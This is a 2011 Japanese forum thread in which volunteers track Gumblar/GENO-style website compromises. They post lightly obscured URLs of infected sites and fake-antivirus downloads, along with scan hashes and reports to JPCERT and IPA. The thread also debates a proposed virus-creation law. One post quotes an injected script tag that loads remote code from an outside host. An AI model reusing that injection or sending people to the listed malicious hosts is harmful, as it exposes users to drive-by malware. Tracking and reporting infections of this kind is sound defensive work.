(＞ｗ＜)8が二つで！ラッキーん☆

88をゲットしたので久々にこの顔登場

　　　　 　∞
　　　8�Vд�V8 !?

NHK教育 23:30
ITホワイトボックス2選 脅威ガンブラーウイルスの正体▽感染拡大の謎▽対策は?

株式会社GENO - ECサイト運営スタッフ募集
http://www.find-job.net/list/j83468.html?from=23

汚染を除去しました。

やめろや

★110112 news ウイルスコード「Scriptini」マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1294815235/

ソースコード流出の件でウイルスコード等の書き込み制限機能を止めてるんだな

ダンさん落ちてる。。。orz....

2chハックの件以降、キチガイを見ないな…

Gumblarももう終わりか、つまんないな

あるっぽい。
Received 2011-01-19 11:54:20
JSUNPACK
8fa8604f9abcf13ca0abe8775cdad54cad50d4a1


VIRUSTOTAL順番待ち7000番台ってどーよ。。。

てす

>>698
malware作者が妨害のためにゴミ投げまくったんでしょ

ウイルスサイトのURL貼ってくんない？
まぢウイルスかかってみたいんだけどさぁ www

>>701
ttp://www.mhlw.go.jp/bunya/kenkou/kekkaku-kansenshou01/index.html

643 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 04:49:34 ID:ATQNV0HP0 [1/5]
1・24学習会　私たちの言論・表現活動の自由が危ない！
すべてのインターネット通信が監視される？
「コンピュータ監視法」とは何か
なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか
　法務省は、今通常国会にウィルス作成罪をふくむコンピュータ監視法を提出しようとしています。
　共謀罪は法律に違反することを実際に行わなくとも、話しあうだけで処罰するものですが、
コンピュータ監視法の中のウィルス作成罪は、同じようにそれが使用もされていない、ウィルスかどうかもわからないプログラム作成の段階で処罰しようとするものです。
そのためには、インターネットによる私たちの通信のすべてが監視されることになるでしょう。
共謀罪とコンピュータ監視法は、いずれも言論・表現行為の段階で、市民に対する監視を強め、規制しようという狙いで一致しています。
コンピュータ監視法には、捜査当局が裁判所の令状もとらずに、プロバイダーなどにパソコン、
携帯電話のメールやホームページへのアクセスなどの通信履歴を90日間保全要請できるという規定もあります。
　コンピュータは現在市民にとって必要不可欠な通信手段となっています。
この法案ができれば、通信の秘密が侵害され、市民の自由な言論・表現
　活動が規制されて、民主主義を危うくするでしょう。
　学習会で詳しく学び、コンピュータ監視法の国会提出に反対しましょう。お誘いあわせてご参加ください。
■と　き　1月24日（月）午後6時30分〜
■ところ　かながわ県民センター７０９号室
（横浜駅西口から徒歩５分、ヨドバシ・カメラ裏）
地図　http://www.pref.kanagawa.jp/osirase/02/0051/center/access.html
■お話し　山下　幸夫さん（弁護士）
「なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか」
■参加費　500円
■主　催　盗聴法に反対する市民連絡会
連絡先　日本消費者連盟　Tel.03-5155-476 5
ネットワーク反監視プロジェクト　Tel.070-5553-549 5

644 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 04:49:58 ID:ATQNV0HP0 [2/5]
110124コンピュータ監視法学習会
iwakamiyasumi on USTREAM: フリージャーナリスト・岩上安身が、どこにでも出かけて、誰にでも取材し、可能な限り、ダイレクトに情報をお伝えします。インタビュー、対談、記者会見、などなど。. ...
http://www.ustream.tv/channel/iwakamiyasumi
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/
Togetter - 「コンピュータ監視法学習会tudaりまとめ」
http://togetter.com/li/92712
神奈川県横浜市神奈川区鶴屋町2-24-2 - Google マップ - かながわ県民センター
http://maps.google.com/maps?ja&channel=suggest&q=%E7%A5%9E%E5%A5%88%E5%B7%9D%E7%9C%8C%E6%A8%AA%E6%B5%9C%E5%B8%82%E7%A5%9E%E5%A5%88%E5%B7%9D%E5%8C%BA%E9%B6%B4%E5%B1%8B%E7%94%BA2-24-2

第171回国会 議案の一覧
http://www.shugiin.go.jp/itdb_gian.nsf/html/gian/kaiji171.htm
法務省：第１６３回国会（特別会）提出主要法律案
http://www.moj.go.jp/houan1/houan_houan34.html
法務省を対ウイルス法案で突っついてみました
http://angels-pathway.clanteam.com/qa_houmu_antiviruslaw_100818.html

サイバー犯罪条約
http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html

|1・25コンピュター監視法学習会のご案内
|カテゴリ : 監視社会
執筆 : toshi 2010-1-6 3:32

　以下のような学習会を開きます。東京都がネットカフェ規制の強化を条例化しようとするなど自治体レベルでのネット監視がじわじわと進んでいる。
コンピュータ監視法案は共謀罪とともに繰り返し廃案になっているが、共謀罪ほど反対運動の焦点にはなってこなかった。
しかし、民主党政権はとりあえず共謀罪については、法案の提出の動きは見えないが、
コンピュータ監視法案は共謀罪から切り離しての提案もありえないわけではない。油断は禁物というのが現状だということを知ってほしい。

1・25コンピュター監視法学習会のご案内

コンピュータの規制が犯罪対策を理由に年々強化されてきています。こうした
動きを一挙に加速させると考えられているのが、サイバー犯罪条約批准のため
の国内関連法の整備を理由としてだされたコンピュータ監視法です。
コンピュータ監視法の性格は、共謀罪新設法案とともに一体のものとして「刑
法等の一部改正案」としてだされたところに鋭く示されています。
いまやコンピュータは市民の日常生活にとってなくてはならない通信手段です。
サイバー犯罪対策の名の下にコンピュータへの監視・規制を強めようとするコ
ンピュータ監視法の制定を許してはなりません。
同法は、現在共謀罪新設法案とともに廃案となりましたが、法務省などの同法
推進派が条約の批准を理由にいつ上程してくるかはわかりません。
サイバー犯罪条約とは何か、コンピュータ監視法とは何か、学習会を開きます。
ぜひ、ご参加ください。

652 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 05:34:58 ID:ATQNV0HP0 [4/5]
>>645
と　き　　1月25日（月）18時40分〜21時
ところ　　ピープルズ・プラン研究所会議室
(東京都文京区関口1-44-3　信生堂ビル２Ｆ
Tel:03-6424-574 8　地下鉄有楽町線江戸川橋駅1B出口徒歩5分)
　　　　　http://maps.google.co.jp/maps?hl=ja&utm_source=ja-hp
お話し　山下幸夫さん（弁護士）
　　　　「サイバー犯罪条約とコンピュータ監視法」
　　　　小倉利丸さん（富山大学教員）
　　　　「コンピュータ監視法の問題点」
参加費　500円
主　催　盗聴法に反対する市民連絡会
連絡先　日本消費者連盟　Tel.03-5155-476 5
　　　　ネットワーク反監視プロジェクト　Tel.070-5553-549 5
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
コメント (0)トラックバック (0)閲覧 (405)

no more capitalism - 1・25コンピュター監視法学習会のご案内
http://alt-movements.org/no_more_capitalism/modules/no_more_cap_blog/details.php?bid=13
東京都文京区関口1-44-3 - Google マップ - 信生堂ビル２Ｆ
http://maps.google.com/maps?ja&channel=suggest&q=%E6%9D%B1%E4%BA%AC%E9%83%BD%E6%96%87%E4%BA%AC%E5%8C%BA%E9%96%A2%E5%8F%A31-44-3

653 名前：名無したちの午後[sage] 投稿日：2011/01/25(火) 05:37:53 ID:ATQNV0HP0 [5/5]
日曜日, 1月 23rd, 2011 | Posted by KIMURA
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月)

http://www.ustream.tv/recorded/12218086

　ジャーナリスト岩上安身さんのスタッフが生中継を行いました。
　流れとしては、
「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」（通称コンピューター監視法）が提出され、
可決を契機に、現在日本は批准していない国際的なテロ防止と称して情報通信を監視する「サイバー犯罪条約」に批准することが考えられ、
さらに批准を契機に盗聴法改正まで行われるのではないかという見解がある。
広く考えると、憲法によって守られている通信の秘密や表現の自由までも国家権力が脅かしうるという、危険な状況で、
さらにこの法改正を理由に憲法の解釈を変えたり、場合によっては憲法改正までもが行われるのではないか、とも言われている。
　日弁連を中心にこの「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」を廃案にするための動きが起きている。
　もしもこの法改正が進めば、インターネットや携帯電話による市民の情報通信は常に監視されることになるだろう。
警察による通信履歴の検閲や、コンピューター上でのプログラミングすらも、ウィルス作成罪にあたるとして取り締まることが可能になる。
　盗聴法<組対法>に反対する市民連絡会では、プライバシーを侵害し、表現の自由を規制する盗聴法の廃止を求める市民団体共同声明に賛同を募っている。　http://www.anti-tochoho.org/ut/ss20100201.html

　資料としてこちらのHPを一緒にご覧ください。

　コンピュータ監視法に対する疑問（盗聴法<組対法>に反対する市民連絡会 ）
　http://www.anti-tochoho.org/ut/gg20101214.html
　サイバー犯罪条約 http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
　日弁連が提出したサイバー犯罪条約への意見書 http://www.nichibenren.or.jp/ja/opinion/report/2004_23.html


【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/

総務省のインフルエンザのページ貼ったらファビョってしまったようだ
すまない

これなんだ？

analyzer5.fc2.com:8080/ana/processor.php?uid=107662

analyzer5.fc2.com:8080/ana/analyzer.php?uid=107662&pid=0&idsess=&ref=&href=http%3A//zbrjinsoul4.web.fc2.com/&wid=1024&hei=1024&col=24&visitor=1-1642776976-1296198419-0-1-1-0

FC2のアクセス解析だろ

fc2のアナライザーはadblockなんかでブロックしても特に問題ない

>>710
お前さんがFC2アクセス解析が入っているページ(主にFC2ブログ)にリンクを貼った
↓
そのサイト主がFC2アクセス解析を見てリンクを辿った
↓
それがお前さんのサイトのアクセス解析に残った

そんだけ
鑑定は他でやれ

ブラウザを見ただけでボットに感染することってありますか？

>>714
感染した感じがしたら、もう掛かってますw

>>714
どこからここにたどり着いちゃったの？
素人をアピールすることに何の意味があるの？
ブラウザを見るってのは実行ファイルを見るってこと？
ファイル見ただけじゃ感染しようがないでしょ

オミトロンに登録した古いGenoウイルス警告スクリプトがこのサイトに反応した
www●no-review●net/
Javaスク切った状態でアクセスしてるから異常は無いと思うんでウイルスチェックはしてない。
みんなはどう？

>>716

最近活気無いなあ
そろそろいいの？

>>717
いろいろアレだけど
JavaScriptオフで防げないのもあるから注意してね

【AV女優】晶エリー（大沢佑香）の公式サイトがGENOウイルスに感染中！
http://hato.2ch.net/test/read.cgi/news/1296896238/

>>721
ソース見たけど1行目からロシア行こうとしててすごくおろロシア
末尾にもあるね

>>721
whoisでぬるぽ完了。

>>721-723
消滅じゃなくて戦略的撤退だったのね･･

改竄祭絶賛開催中
isawa-crystal●com/
ソース見てワラタ

>>724
ひどすぎて吹いた
danさん経由なのにAviraが怒り出すしひどい

>>724
乙
whoisからメルかんりょ

>>726 乙

どっとこむ8080装填中
club-garcons●com/

>>727
banana3306●maido3●com
う〜む。。。

>>727
いちおメルすた。
連絡先がドコダなので蹴られている可能性大。。。

http://qb5.2ch.net/test/read.cgi/sec2chd/1296394964/366

システム復元で偽セキュリティを駆除できると思ってる大馬鹿者が急増してるなｗ

VTがおかひいお。。。

(・肉・) ﾄﾚﾄﾚﾋﾟﾁﾋﾟﾁｶﾆﾘｮｰﾘ♪

JSUNPACK
6e2cf8ebd8635107d4e26b2861c3a26cf4073e14

みん(なあたま)カラ(っぽ)とは良く言ったもんだｗｗｗ
ttp://minkara.carview.co.jp/userid/361321/blog/21640486/
ttp://minkara.carview.co.jp/userid/361321/blog/21668229/

【セキュリティの強化】って、具体的に何をすれば良いのかブログ書いてくれよｗ

>>734
こりか。。。

壁紙を変更する偽セキュリティソフト、国内で感染報告が増える
http://internet.watch.impress.co.jp/docs/news/20110307_431684.html
http://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20110304050209.html

>>734
自分で燃料投下して逆ギレとか、どんだけバカなんだよｗｗｗｗ

!ninja

>>734
>たぶん、セキュリティがちょっと低く設定されていたか
>ＪＡＶＡが最新でなかったのが原因で入り込まれたとか考えられるそうです。
>ウイルスバスターも強制終了ｗｗ
>エ○サイトのURLはLunascapeに登録していたので消えましたがｗｗ

ユーザーのセキュリティー意識が低ければ
糞の役にも立たないウイルスバスターにワロタ

>>738
それはなんでも同じじゃね
ユーザーが全て許可をしてしまえばおしまい

無知は怖いよ。

アメーバピグのFlaｓｈのバージョンアップで運営ブログが炎上したのだって
未だに平気でVer9を使っている連中が原因だぞ。

>>739
ウイルスバスターは、低次元な広告を見てもアホユーザーがメイン対象にもかかわらず
そのアホユーザーには効果がないなら、存在が無意味だろうし
アホユーザー前提に設計したほうがいいと思うのよね。

許可するシーンで
例のヤクザ坊主が出てきて、しつこく何度も脅すとか
例の女が発狂しているシーンが出てきて、JAVAのアップデートを促すとかｗ

ドライブバイダウンロードを喰らうバカに多いパターン

１：「○○(セキュリティソフト)を入れてるから大丈夫」と豪語している

２：全てをセキュリティソフトに依存しているため、
地雷(DBD)を踏むと高確率で感染する

３：「○○入れてたのに感染した(怒)」と、セキュリティソフトに文句を言う

４：必死になって駆除方法を捜して駆除は行うが、
感染原因を知ろうとしない為、根本的な対策ができない(駆除方法と一緒に書いてあっても一切見ない)

５：２に戻る


セキュリティソフト依存症は病気(精神疾患)ですよｗ

依存してるんじゃなくて何も知らないだけってのもある
セキュリティソフトも偶然入ってるだけで場合によっては期限切れ

>>741
たしかにそうだね
たとえ誤爆してでも初心者ユーザーには選択肢を与えないほうがきっと安全
バスターが把握していないものは許可しないとかそういうモードをつけてもいいかもしれない
どうせ初心者なら使うソフトも限られてるだろうし

「ウイルス作成罪」新設、提供・取得・保管も 改正案閣議決定
http://raicho.2ch.net/test/read.cgi/newsplus/1299802224/

これからは故意でなくても脆弱性を修正しないで放置して
Gumblarようなウィルスの踏み台にされた時点で逮捕されるわけだな。

>>744
>作成罪に加え、提供、取得、保管などの罪を新設。

マルウェアの取得が違法
↓
ベンダーに検体が提出されない
↓
極地的に流行るマルウェアに対応できず、感染PCが急増
↓
感染したPCを所有する者は容赦無く逮捕
↓
罰金(30万円以下)と、証拠品として押収したPC(クリーニングされた後、中古品として販売)でガッツリ稼ぐ


さすが欠管政権ｗ
穴だらけなのに隙が無いなｗｗｗｗ

記事には書いてないけど、提供・取得・保管が罪になるには前提条件があって
他人のPCを感染させる目的の場合らしいよ

>>745
辞民党は何もしてこなかったけどなｗｗｗｗ

>>747
法案自体は，2004年2月の第159回国会で閣法（内閣提出法案）として国会に提出されました。
とあるので、何もしてこなかった訳ではないらしい

ウイルス作成罪はいつになったら成立するのか
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20061201/255707/

ウイルス作成罪新設　刑法改正案、サイバーテロに厳罰 2011/3/11 8:43
ttp://www.nikkei.com/news/headline/article/g=96958A9C93819481E3E3E2E2EB8DE3E3E2E1E0E2E3E3E2E2E2E2E2E2

> ウイルスの取得や保管も罪になり、２年以下の懲役または30万円以下の罰金。
> 対策ソフトの開発などが処罰対象とならないよう、
> 処罰の要件に「正当な理由なく」との表現を盛り込んだ。

> ウイルス作成罪創設の改正案提出は自公政権当時から３回目。

お、停電復帰したようですね貴方

Flash Playe 10.2.153.1
http://www.adobe.com/jp/software/flash/about/

>>721-722
すまない、いったいどんなソースコードがあったんだ?

>>752
だいたいいつものやつだよ

（�Vд�V）の俺様ブログ -顔文字の俺様ブログ-
ttp://ruhuraro.blog57.fc2.com/
>このページの表示は許可されていません
>このブログは下記の理由などにより凍結されています。
>* 規約上の違反があった
>* 多数のユーザーに迷惑をかける行為を行った。

震災の記事の件で通報したら消滅すたｗ

>>754
http://megalodon.jp/2011-0322-0049-18/ruhuraro.blog57.fc2.com/blog-entry-347.html
これか？

>>755
こりゃ凍結されても仕方ないわｗ

>>755
閲覧を観覧と書いちゃう男の人って…

>>754-755
ttp://ameblo●jp/ruhuraro/entry-10847321466●html
>(�VД�V)┌ んなことよりfc2でやってる俺様ブログがなぜか凍結されたぜ
>ｌ(�VД�V)ｌ一体、この俺様が何をしたというのかあぁぁぁぁああああ！！！！
>(�Vд�V )震災をネタにしすぎたかしらん♪ちょっぴ反省w

反省しなくて良いからさっさと氏ねよ

http://www.google.com/search?num=100&q=lizamoon%2Ecom%2Fur%2Ephp

「ウイルス作成罪」盛り込んだ刑法改正案、国会に提出
http://hatsukari.2ch.net/test/read.cgi/news/1301929633/

新型SQLインジェクション攻撃「LizaMoon」多発〜日本でも改ざん例を確認
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2539

http://www.google.co.jp/webhp?sa=N&hl=ja&tab=lw#hl=ja&source=hp&biw=1396&bih=763&q=http:%2F%2Flizamoon.com%2Fur.php&btnG=Google+%E6%A4%9C%E7%B4%A2&rlz=1R2ADBR_ja&aq=f&aqi=&aql=&oq=http:%2F%2Flizamoon.com%2Fur.php&fp=ff099f39f2c306f8

Wo[BLOCKED]ks.com/ur.php
al[BLOCKED]ne.com/ur.php
al[BLOCKED]er.com/ur.php
li[BLOCKED]on.com/ur.php
t6[BLOCKED]56.info/ur.php

【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://hibari.2ch.net/test/read.cgi/sec/1279692828/

>>751
10.2.159.1

!denki!ninja

ほんまにわらかしてくれる
無菌状態にしようとするからいたちごっこになる
ゾンビの体でなにが来ても復活できるようにすれば問題なくなる。
仮想環境はもっと使いやすく作れるだろに
セキュリティ産業をすぐにすたれさすのはもったいないと言って
作らない。

>>751
10.3.181.14
http://www.jpcert.or.jp/at/2011/at110013.txt

test

JSUNPACK
> MySQLdb error
orz...........

JsunpackがトンだらとりあえずWepawet使えって爺ちゃんが言ってた

>>771
今流行のSEOポイズニングっての突っ込んだら固まったお。。。

Wepawetはすげー時間かかるよ

6月1日からは日本がインターネットの枠組みそのものから離脱するのかのう

ノ

も少し待つやうにすんべさ。

>>775は>>773宛

>>774
なんぞなもし。

>>751
10.3.181.16
* IEのみ

>>751
IE　10.3.181.23
Fx　10.3.181.22

http://hibari.2ch.net/test/read.cgi/sec/1299413878/l50
ここの >>937 見てみ
香ばしさいっぱいだからｗｗｗ

それNOD32厨の自演だろｗ

>>779
専ブラ使うといいよ

Java
http://www.jpcert.or.jp/at/2011/at110015.txt

http://www.jpcert.or.jp/at/2011/at110016.html
http://www.jpcert.or.jp/at/2011/at110017.html
http://www.jpcert.or.jp/at/2011/at110018.html
http://www.jpcert.or.jp/wr/2011/wr112201.html

>>751
10.3.181.26

Mass Meshing Injection: sidename.js ongoing
ttp://blog.armorize.com/2011/06/mass-meshing-injection-sidenamejs.html
ttp://www.google.co.jp/search?q=%22script+src%3D%22+sidename.js

まぁ誘導先も正規サイトで組まれているってのは
既にGumblar.xが通った道なので
Armorizeが主張するほど革新的な物ではない気がする

アルファルファモザイクの様子がおかしい

GENOウイルスってもう下火になったのかね
ここも全然レスないし

なってないよ
むしろ流行を終えて定着した

セキュアブレイン gred セキュリティレポートVol.24【2011年6月分統計】
http://www.securebrain.co.jp/about/news/2011/07/gred-report24.html

取扱注意
www●hotel-socatel●be/

釣りに使った場合･･違法になるかどうかはしらん

>>786
今の状況は
Gumblar.xは去年から停止中
8080は一部サイトで不審なコードが定期的に追加される状態が起こってる感じ

>>789
うさんくさいサイトのようだけど
トップページには特に不審なコードはないように思うん

http://www4.ocn●ne●jp/~scicomm4/eisuri●htm

http://www●radio-80●com/soft●exe
偽アンチウィルスソフト配布してるぞ

otyu

>>791
おしんにつーほ。

>>792
404

http://www●ganbanyoku-tsubaki●jp/
ccドメインのexploitコードを食わされるパターン

http://www●expressionengine●jp/
難読化されてるタイプでやっぱりccドメインから

いまきた

>>794
こちらの環境だと*.cu.ccより先に逝けない。。。

>>795
あとでみゆ

あっー、ひとつ手前の*.cz.ccにも逝けなくなった。。。>>794

アクセスログとってるのか？

http://arthurcallum●gozaru●jp
ロシア系？exploiｔキットのドロップゾーン
４０４とか嘘ついてんじゃないよ

jpから来たの弾くパターンもあるみたいだけど
jpドメインをつかって他国の人間をターゲットにするんかいな

>>799
過去ログにその解説があったはずぅー。>>31-32かな。

おぉ、よく見なかった。
踏み台とか結構あったよ>>799

JP外しは結構前からされてる戦略なのか
儲からんし、めんどくさいんだろうなあ

>>794
おくた。

>>795
デジロにつーほ。
でもデジロは遅いので、どなたかふぇーすぶっくから教えてあげてくらはい。。。

>>798
みてみゆ。。。
眠い。

二つ目の*.ruに逝けない。。。>>798

>>798
とりあえずさくらにつーほ。

あきたねる

http://saito-bara●com/funny●html
ccドメインから旅にでます
http://www●e1homes●jp/
おおなつかしいタイプ　ロシアに行こう

おまけ
http://www●momohime-medical●com/~momohime/deary82●html
http://www●passo-co●jp/~passocojp/lean77●html

両方とも同じグループに属してる？踏み台　薬を売ってくれるサイトに誘導してた痕跡がある

てす

>>807
サイバー犯罪対策課に通報済

>>807
それは去年の8080の時のものです
その踏み台リンクと画像(deary82.jpg、lean77.jpg)をのせたメールをボットマシンで配信してた

昼間2ちゃんねる落ちてたね。

>>806-807
おちゅ
つーほーしました。

今も落ちてるよ

www●niki-selection●com
今話題の通販系にインジェクションしちゃうタイプ

>>813
これからみゆお。

また蹴られてる*.えう
orz....

>>813
おちゅ
ど〜ん

http://www●sippo-booomb●com/
去年は動いてたようなやつ
ロシアから直接.jsがやってきてたようだ

>>816
お疲れ様です。
さくらにつーほ。

>>813これだっけ
「osCommerce」の脆弱性を利用したウェブサイトの改ざん被害が拡大 セキュアブレインが『gred セキュリティサービス』『gredでチェック』で対応
http://www.securebrain.co.jp/about/news/2011/08/oscommerce.html

Adobe Flash Player 10.3.183.7

もう、メンドイので直リン
http://hibari.2ch.net/test/read.cgi/win/1305730772/5

>>818
うん

ttp://jsunpack.jeek.org/dec/go?report=a2b5afc3cdb263167efc5ea36747d128f0921f6d

<title>SELECTION</title><script src=http://exero●eu/catalog/jquery.js></script><title></title>

http://exero●eu/をググると感染サイトがゴロゴロしてるな

http://www●asakusa-kagetudo●com/modules/shop/
このディレクトリすごく臭いです。
例えば/shop/es.txt??とか
C&Cサーバっぽいことになってるのかな

よくみりゃIRCでボットに命令するみたいだ

http://iconic-intl●sakura●ne.jp/
これだけだと問題なさそうだけど
こいつをつけるとwolve●html
害はなさそうだけど、アレなページに飛ぶようだ
こういう会社なんだろうか

踏み台にされてるんでしょ

Win32/Daonolの亜種で、midi9を使っていないものってありますか？
症状が全く同じもののPCを持っていますが、本来ある場所にあるはずのmidi9がありません。

すいません。ウイルスが原因ではない問題だったようです。
スレ汚し失礼しました

>>825
あるとおもうよ
そういう調べ方はやめたほうがいい

http://www●ibs-radio●com

www●dinsuceava●roがアレですかね・・・

>>828
ですね~

Google セーフ ブラウジング診断 より
疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
過去 90 日間に、このサイトの一部で不審な動きが 2 回検出されています。

このサイトで過去 90 日間に Google がテストした 92 ページのうち 23 ページで、
ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは 2011-09-23 で、このサイトで不審なコンテンツが最後に検出されたのは 2011-09-23 です。
不正なソフトウェアには 24 trojan(s) などがあります。感染先のコンピュータで平均 4 個のプロセスが新たに発生しています。


Online Link Scan （AVG・Google・SiteTruth・PhisTank） ・・・ 未検出
セキュアブレイン gred ・・・ 未検出orz（通報済み）
シマンテック ・・・ 未検出orz（通報済み）

今北

>>828
リロードしたらスクリプト消えたん。

>>829
乙です。

とりあえずJSUNPACKにスクリプトかけてみたお。（その間に対応されてた。）
407f4efb5e405a90d8aee230d5676eb4b3b795a6

被害サイトは・・・IBS 茨●放送
茨●県を放送対象地域とする中波（AM）放送局を保有する
基幹放送局提供事業者である
株式会社IBSの設備を利用してラジオ放送を行っている。

茨●方面、他にもあるかもよ
roはルーマニアのドメインだね

一応こちらからもJPCERT/CCとIPA他にスクリプトとその先のスクリプト、>>828の下でのぉとんせぃふうぇぶで出てくるjarを送ったお。

VTいきなり死んだ。。。orz.........

>>829-832 ご確認とご対応ありがとうございました。
特に◆.htmlint.Uさんは毎回お疲れ様でございます！

識別代わりにコテ付けてるだけです。
八頭さん、コテハンさん、夷塚さんをはじめとするコテの方々、名無しのみなさんに比べればまだまだです。

なによりもお伝えいただいた828さんに感謝です。

とりあえずここのスレに挙げられているサイトを
サイトのアドレスの一部をワイルドカードと合わせてavastのサイトブロックに登録するだけで有効かな?

http://konishi-ballet●com/
すごいことになってますな

>>835
まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。

>>828
ここが震源地だたぁーのね。
http://hatsukari.2ch.net/test/read.cgi/news/1316848525/

>>836
目が痛い。。。

>>836
お疲れ様です。
鯖缶、上位鯖缶とかにつーほーしました。

茨城繋がりだたーのね。

Tokyo鯖の●阪のバレエ研究所らしいorz
IPA往きが一番いいけど・・・土日とか大丈夫なんだろうか？

>>1
>>5について、日本地域における性能・効果も加味して再検討をしてみた方がいいかも
http://hibari.2ch.net/test/read.cgi/sec/1314348991/7
いづれにしろ攻撃は止まないし、無差別で、拡散も速い

>>839
鯖缶が茨城。。。
>>806と同じらしいスクリプトも
誰かが投げた分
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1312351077
漏れが投げたの
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1316904594
まぁ偶然だと思いますが。

関連性でいうと大学のアメフト、大学のラクロス、大学の薙刀のほーが感染経路的に分かりやすかったかも。

>>837
>まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。
何を言っているのかわからない
「ここで出たのを初回として3回目のとこを管理者だめっぽいので」ってどういうこと?

>>841
一度対応されてから、再改竄->再対応、再々改竄を確認したのがあったので。

日本語では「3回目なので」と言うんだ

(ﾟνﾟ)ﾆﾎﾝｺﾞﾑｽﾞｶｽｨﾈｰ

>>840
なるほど>>6には無いけど
登録が東京でもピュアニックは茨●なんだね
関連性や着眼点はランダムであっても注視しておいた方が後学にはなるかも

Google セーフ ブラウジング診断は、追跡開始と同時に90日間の結果も教えてくれる
各自、地元放送局やラジオ局など気になるキーワードでざっと調べてみるといいよ

>>792はローグソフトばら撒く砲台リンクってわかってここに書いた後、すぐになくなってしまった。
http://www●ganbanyoku-tsubaki●jp/
ここって絶賛放置中でしたっけ

>>846
今現在、TrendMicroとFortinetだけ反応してるようだ

Aviraとセキュアブレインとシマンテックへ依頼を出しました。

>>846
(　ﾟдﾟ)ﾋﾞﾝｺﾞｰ>>794
>>837,841-842

>>848
乙です。

http://www●cometcrash●com

このサイト乗っ取られちゃってるんですかね？
グーグルのキャッシュだとゲーム関連のサイトのようですし。

>>850
Server HackeD By TiGER M@TE

遊んでますねｗ

2000鯖サイト改竄の模様ですが.....

怪しげなGenuineCheck.exeが開くと落ちて着ます
サイト開くのに必要なのか.....Winエミ梨で実行不能だけど

ttp://www.google.co.jp/search?q=%22jjghui.com%2Furchin.js%22

もう何も見えない

JSUNPACK
1f8a23b66cec81cb6d0305139524e72e0a7ec842

んーどぼじよう

>>854は目の痛み

>>854
リンク先のアダルトサイトからscandsk.exeが落ちてきた
…けどVMで実行しても何も起きず。

とりあえずavastに検体提出

>>853
ｵﾂｶﾚｻﾏです。
&lr=lang_ja
日本語ページのある彼の国とこへメル
蒲公英は現在無い模様。。。

>>856
お疲れ様です。
nu蹴られちゃってるっぽいので助かりまうす。

っと、もひとつあたー>>857

>>858
FakeAVげと
http://www.virustotal.com/file-scan/report.html?id=1d2aab09516985ff529e5d05a4a496f8f4ac911f62713066906c117789dc0ed3-1317997276

結構なスルー率だねえ

>>859
過去ログっぽかった。
あきたねる

>>860-861
BitDefenderだけｗ

VTしぼー中
>>860
別のアドレスに飛ばされるようになたー。ファイルは同じもの

http://www●huimeihotel●com/
http://www●huihuahotel●com●cn/

evar●lflink●comがそうなのかな

ckt6●cnじゃなイカ？

>>865-866
ノ

>>865
IPAとかにつーほー

>>866
IPAとかに丸投げしますた。。。おｒｚ。。。。。。

>>583
>>853
( ﾟ∀ﾟ)ｱﾊﾊ八八ﾉヽﾉヽﾉヽﾉ ＼ / ＼/ ＼

だりかお願い

ﾉｼｼ


やっと消えたお >>868,>>583

>>866-867
乙です〜

>>870
ノ


悲しいお知らせ
折角10/43まで逝った>>860ですが…
http://www.virustotal.com/file-scan/report.html?id=7e3d271dd1883d44051abb2b0380248cb7dd58164b18bb34a15a4031a5ac37e5-1318345034
4/43のご新規になりますた。。。

>>871
いつも乙です
時間のある時にでもまた検体調査に行ってくるかな・・・

>>871
むゎたかわったぁ
http://www.virustotal.com/file-scan/report.html?id=1f4580667000cf8c8a2875f2520babd38c013c73e0ac5b5da2ee254438119239-1318425656
4/43

こりゃてーへんだ＞ベンダー

>>873
落ちてくる検体も変わったねぇ
http://www.virustotal.com/file-scan/report.html?id=740e94ee09dd9c14a0885e45435e78fb384928f4823f0a1a9115e9af83c3dfd4-1318432094
相変わらず何も起きないけど

VT
うｒｌ
c41e3a4f7ce7de96783854658a1241c7-1318588576
ふぁいる
786d47110b92908dd5ced091bfea6046ddd8a87b0770abecfae61628b7199563-1318596141

JSUNPACK
f0091f107e0bd469a047c33d1f9c4c20c4d239d9

飛び先はまたころころ変わりそう。。。

http://www.virustotal.com/file-scan/report.html?id=494c5d3dd3386193f3ca72d7a31c04cbf99420b49fd7a32c0c0f3a0834010d8c-1318596879
6/43

>>874
exeお願いします。m(_ _)m

>>876
すでにリンク先が変更に・・・毎日変更ですかorz
今回はWebページ型FakeAV付き

Jsunpack
928990f5a388f32839a21c81c23ee4f880d42693

Webページ
f958e91b6e19ecfb7d6fac4c94231b0abb7ad2bac31c692b9c87ff6027a8bacb-1318684027
2/ 42 (4.8%)

本体EXE
8065d71f793769d4d9cc1c341e2d038d95428e0aeeaf3702c9e31ff590921747-1318684037
12/ 43 (27.9%)

落ちてきたルートキット？(既出っぽい)
8fb7c5dc29ca514bc2987d270513c86a3084466b23213d224408c682b8171405-1318684489
25/ 43 (58.1%)

>>877
